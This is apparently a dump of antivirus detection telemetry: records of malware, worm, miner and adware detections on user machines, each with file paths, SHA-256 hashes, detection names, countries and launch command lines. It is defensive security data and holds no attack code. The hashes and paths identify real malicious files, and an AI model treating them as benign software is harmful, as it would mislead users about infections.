  Row(detection=Row(filename='avscan-20181101-195454-ff349b0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195454-FF349B0D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='4ea6759c94d6a9eab86d8a60b2fa5fe66620d587ddb4374b950b491fa6dfa7b6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:54:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T00:49:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T07:18:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103428-1229ab7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103428-1229AB7F', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmotzosgz2.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmOTZOSGZ2.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123510-3177642c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123450-1FF89EB3\\AVSCAN-20181101-123510-3177642C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T06:54:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,bauefjc', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='summary test februarii 2013.xls', filepath='\\\\sango04\\rheology\\Batu Bara\\Laporan BB 2013\\Summary test Februarii 2013.xls', filesize=64000, name='X2000M/Laroux.B.#M1.#R1'), hash='c02dd5aca656e297eff47d40d4017bd7d4f1c717d4091b9b60e828c2f079bda1', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674360, timestamp='2018-11-01T08:12:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='b52278df2311be6c00354be73b7a31bdeaac454142df158e4fe0c9ed6e7313f6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsn7458.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:36:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft office 2007 full serial __3108_il5153(2).exe', filepath='C:\\Users\\X\\Downloads\\Microsoft Office 2007 Full Serial __3108_il5153(2).exe', filesize=696000, name='ADWARE/Amonetize.Gen.#M300.#R6412'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T06:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nskBD05.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192347-b5777aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192328-B38F4DBB\\AVSCAN-20181101-192347-B5777AFF', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111529-1cd2261c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111529-1CD2261C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baqqnarf.exe', filepath='I:\\RECYCLER_DETEC\\S-6-6-57-2067840111-7214750817-811023153-6264\\baQQNArf.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8f7b35340ba77e8a9d965e7cb804bd1cb4fbe8a92438390b55693dd58d8c9691', metadata=Row(cmdline='\\\\\\"I:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T08:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='siemens.automation.remoteaccess.s7wtssvx.exe', filepath='C:\\Program Files\\Siemens\\Automation\\Portal V13\\Bin\\Siemens.Automation.RemoteAccess.s7wtssvx.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='7f7774046fac5e4b5a36e752e6b4b4e9ce26c6c35e30bad14c87724d66203ebf', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:40:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xw4rin9kc4btv.exe', filepath='d:\\users\\X\\appdata\\local\\temp\\xw4rin9kc4btv.exe', filesize=60000, name='TR/Dropper.Gen.#M300.#R3439'), hash='83b324e78ea3838d0694b997312bdc9148aa8abf9e6dae9274f94ca70e4437a8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='\xa0.exe', filepath='E:\\\xa0.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141125-03e6f122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141125-03E6F122', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\D:\\Tools\\wintool\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninst.exe', filepath='I:\\Program Files\\Sony Mobile\\Gordons Gate\\uninst.exe', filesize=4608000, name='W32/Sality.AT.#M1.#R1'), hash='ab0a040867328aa2c12aef17a37a48996274e1b766238d11171a3c56d701100c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:00:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\backup_log\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc82ae6707-ba4e-c54e-8eb3-8a6964c533b4.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc82AE6707-BA4E-C54E-8EB3-8A6964C533B4.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234011-71450233', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73bebb3c\\AVSCAN-20181101-233925-6B727E5B\\AVSCAN-20181101-234011-71450233', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002845-6143bd29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002845-6143BD29', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup (1)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup (1)\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:14:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0008241.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0008241.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102823-4677c536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98c59dbc\\AVSCAN-20181101-095841-98364287\\AVSCAN-20181101-102823-4677C536', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:33:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pandroidmtkimei.dll', filepath='g:\\ســــــــــــــــــــــــــوفـت\\بوكسات\\فلكانو جديد 4 -2016\\PAndroidMtkImei.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='6bc8424417620ad92382606fcf58065d2029aa94b6eee2616a5f391c53091ef9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-071337-5e9d0053', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9bb611a\\AVSCAN-20181101-055500-1F89EAA1\\AVSCAN-20181101-071337-5E9D0053', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\uTorrent\\updates\\3.4.9_42923\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='648b71d0cb58fca8e568b3ee4e575572def835a45df05a7b5008cc82b26a844f', metadata=Row(cmdline='\\\\\\/apps \\\\\\/fast \\\\\\/ext \\\\\\"exe,sys\\\\\\" \\\\\\/output \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_SAMSUNGNP300E5A.xml\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T06:07:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xuetr.exe', filepath='K:\\HBCD\\Programs\\XueTr.exe', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0e09d4d5ac2de10bd819ed09ec0362aaf76bf285280a9178083f063acb9f5438', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T17:30:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-061734-c4acfb14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9bb611a\\AVSCAN-20181101-055500-1F89EAA1\\AVSCAN-20181101-061734-C4ACFB14', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:20:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016_3.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Setup_WinThruster_2016_3.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/onboot', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3911248, timestamp='2018-11-01T09:12:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000085a', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000085a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc98b24688-accd-b448-a553-ec8a78798704.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc98B24688-ACCD-B448-A553-EC8A78798704.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T17:21:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0738b8be334aeed041b778834c622cf0ba20f95d53a0eed2babbcf670bdba04e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\0738B8BE334AEED041B778834C622CF0BA20F95D53A0EED2BABBCF670BDBA04E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0738b8be334aeed041b778834c622cf0ba20f95d53a0eed2babbcf670bdba04e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:08:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:56:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174734-37f535ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b063e7\\AVSCAN-20181101-174631-30AB3598\\AVSCAN-20181101-174734-37F535AD', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:20:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Windows.old\\Users\\Admin\\AppData\\Local\\Temp\\33ckze3u0hw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:53:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trconsole.exe', filepath='\\\\s-s\\rarus\\TRConsole\\TRConsole.exe', filesize=6464000, name='W32/Alman.BB.#M1.#R1'), hash='e42b805fb971a947c7d5e0dee8bbec2c64e41b6cb9b0549de38d6b5d935520c8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cv 2017-2018.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\CV 2017-2018.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='onxoeges.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\OnxOeges.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093742-b10b0c81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093742-B10B0C81', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='netscan.exe', filepath='D:\\forensics\\netscan.exe', filesize=640000, name='TR/Crypt.ASPM.Gen.#M300.#R4882'), hash='eb274eff0102f18fd7c13ba96efc4e9849bb80aa78dea30fa1f64e23b7411c61', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T17:42:27Z'), dt=datetime.date(2018, 11, 1)),
